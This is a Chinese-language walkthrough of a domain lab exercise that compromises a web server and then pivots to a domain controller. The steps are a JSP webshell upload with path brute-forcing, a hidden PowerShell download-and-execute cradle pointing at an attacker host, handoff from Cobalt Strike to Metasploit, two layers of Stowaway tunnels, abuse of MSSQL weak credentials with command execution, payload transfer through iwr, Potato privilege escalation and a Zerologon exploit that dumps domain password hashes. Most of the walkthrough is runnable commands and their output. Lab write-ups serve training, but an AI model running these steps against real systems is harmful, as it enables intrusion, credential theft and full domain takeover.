域靶场6-WP

域靶场6-WP

靶场环境大概是这样的

f70dd40d9f20250827085558

外网主机上线

注册一个用户,登录后台后,找到个人资料功能点,有一个上传文件的功能点,F12找到路径(https://blog.csdn.net/qq_42321190/article/details/139424041参考的这个)

c8fa36e33420250826172107

访问路径,进行上传文件操作

379a69c05220250826172304

数据包内容为大马

https://github.com/tennc/webshell/blob/master/www-7jyewu-cn/%E9%9D%9E%E5%B8%B8%E7%89%9B%E9%80%BC%E7%9A%84Jsp%E5%A4%A7%E9%A9%AC.jsp

c77025333d20250826172305

将数据包后缀名进行反复上传

29dde5478420250827090029

复制返回路径

ab28e0312c20250827090214

寻找一下图片的路径,用BP抓包,抓不到浏览器访问的包,手动构造一下

10.10.0.123:8088/upload/20250825/tes_20250825103054099.jpg

修改后缀名为jsp,将后三位进行爆破

08f4c60a2020250827090247

cf39c50cc520250827090318

找到上传成功的jsp

4947a3e21320250827090349

访问

1254bd8abf20250827090426

CS设置监听

5177a39fff20250827090506

生成攻击载荷

powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://ip:端口/a'))"

473fa8bc9b20250827090536

运行

3d253895d420250827090610

上线CS,并提升权限

f68142ecbf20250827090639

没有在域里

shell ping DC

1b9006066220250827090711

发现192.168.0.126/24网段

3352d9df5720250827090743

CS联动msf

将0.126上线到msf上,CS创建监听

c61060a32f20250827090935

msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 48012

CS执行

spawn msf //msf是监听器的名字

5b11f4f9ab20250827094438

不出网第二台主机上线

搭建代理,使用Stowaway工具

在服务器上运行

./linux_x64_admin -l 8000 -s 123

将工具 上传到第一台主机192.168.0.126上

d712fa3cea20250827091057

运行

windows_x64_agent.exe -c 服务器ip:8000 -s 123 --reconnect 8

e0b9a98cb720250827091128

然后创建隧道,我这报错是因为我已经创建了一个,让我把旧的停了

e1e33b7bb820250827091214

Proxifier创建规则

41d23f67d820250827091326

dddd进行扫描,扫描出mssql弱口令,sa/admin123

4e36205ae220250827091405

MDUT可以连接成功

e66d917fe220250827091440

激活组件后,可以执行命令,依旧有两个网卡,还有一层

5fc9c3727420250827091516

也可以使用msf的auxiliary/admin/mssql/mssql_exec

先添加路由

run autoroute -p

run post/multi/manage/autoroute

16dd608d6d20250827091547

设置/mssql_exec各个参数

msf exploit(windows/smb/psexec) > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set session 6
msf auxiliary(admin/mssql/mssql_exec) > set PASSWORD admin123
msf auxiliary(admin/mssql/mssql_exec) > set username sa
msf auxiliary(admin/mssql/mssql_exec) > set cmd ‘whoami’
msf auxiliary(admin/mssql/mssql_exec) > set RHOST 192.168.0.128
msf auxiliary(admin/mssql/mssql_exec) > options

fc0a422d8c20250827091621

运行以后报错

fed6cb477e20250827091702

不知道什么原因,只能不设置session了

msf auxiliary(admin/mssql/mssql_exec) > unset SESSION

运行,又报错,报错原因是数据库名不对

2f6b94b3cb20250827091737

想把数据库名清空,set --clear DATABASE,但还是报错

bb64cf9da320250827091800

最后使用系统默认库,master

msf auxiliary(admin/mssql/mssql_exec) > set DATABASE master

运行成功

0757fe990d20250827091835

中转上线第二台主机

新建一个监听

e524e99df620250827091908

73490ff0eb20250827091924

生成exe,在目标上执行就行了,但是第二台不出网没办法直接下载

1d7c33196020250827091957

把exe上传到第一台主机上

7c18dc3c5720250827092108

使用MDUT访问第一台,下载到第二台

这里尝试了curl、wget等,不是因为主机本身没有工具就是因为权限不够,权限不够最后选择了这个路径C:\Users\MSSQLSERVER

powershell -c “iwr -Uri http://192.168.0.126:8088/upload/20250826/be_x64.exe -OutFile C:\Users\MSSQLSERVER\be_x64.exe”

运行

C:\Users\MSSQLSERVER\be_x64.exe

ae61398c7320250827092148

上线

dc3363d31520250827092212

提权

0782f1de7d20250827092238

烂土豆运行whoami的结果是system

e2f4baf29520250827092313

那直接运行中转的exe文件,直接system权限上线CS

a132f5b63e20250827092334

52bb45b33320250827092356

不出网第三台主机上线

存在域环境,并抓取了hash等(通过CS的psexec横向失败,希望有懂得大佬提点我一下感谢感谢)

域内横向没成功,那搭建代理吧

再搭建一层代理,为了访问到10.10.10.139

上传代理工具到10.10.10.136,还是通过刚刚的方式,要上传到/upload/20250826/路径下,这个截图有问题

b5ccbd01a020250827092455

powershell -c “iwr -Uri http://192.168.0.126:8088/upload/20250826/windows_x64_agent.exe -OutFile C:\Users\MSSQLSERVER\windows_x64_agent.exe”

8cc6c89cd520250827092552

在use 0上起一个监听,依次输入1和监听端口27850

bd09a0a5fd20250827092905

在10.10.10.136上执行命令

C:\Users\MSSQLSERVER\windows_x64_agent.exe -c 192.168.0.126:27850 -s 123 –reconnect 8

784c03cfbe20250827092957

二层代理搭建完成

30feb3f83020250827093025

在新加的代理上起一个socks隧道

89c77b039e20250827093053

Proxifier上再添加一个规则

15910b17a520250827095600

然后我用dddd扫了一下,但是没有东西可以用

4020a8648020250827093137

直接使用工具,工具地址 https://github.com/StarfireLab/AutoZerologon

上线第三台主机

python AutoZerologon.py 10.10.10.139 -scan

e9c641c70d20250827093223

python AutoZerologon.py 10.10.10.139 -exp -user domain_admins

Administrator:500:aad3b435b51404eeaad3b435b51404ee:81220c729f6ccb63d782a77007550f74:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:b20eb34f01eaa5ac8b6f80986c765d6d:::
sec123.cnk\cnk:1108:aad3b435b51404eeaad3b435b51404ee:83717c6c405937406f8e0a02a7215b16:::
AD01$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SERVER2012$:1109:aad3b435b51404eeaad3b435b51404ee:fd62e356f4c597184b47bf7781fece12:::

31ec4b067520250827093252

python AutoZerologon.py 10.10.10.139 -shell

d62567951620250827093328

有写的不对的地方请指正轻点喷

域靶场6-WP-棉花糖会员站
域靶场6-WP
此内容为付费阅读,请付费后查看
9999积分
付费阅读
已售 9
© 版权声明
THE END
喜欢就支持一下吧
点赞22 分享
评论 共1条

请登录后发表评论

    请登录后查看评论内容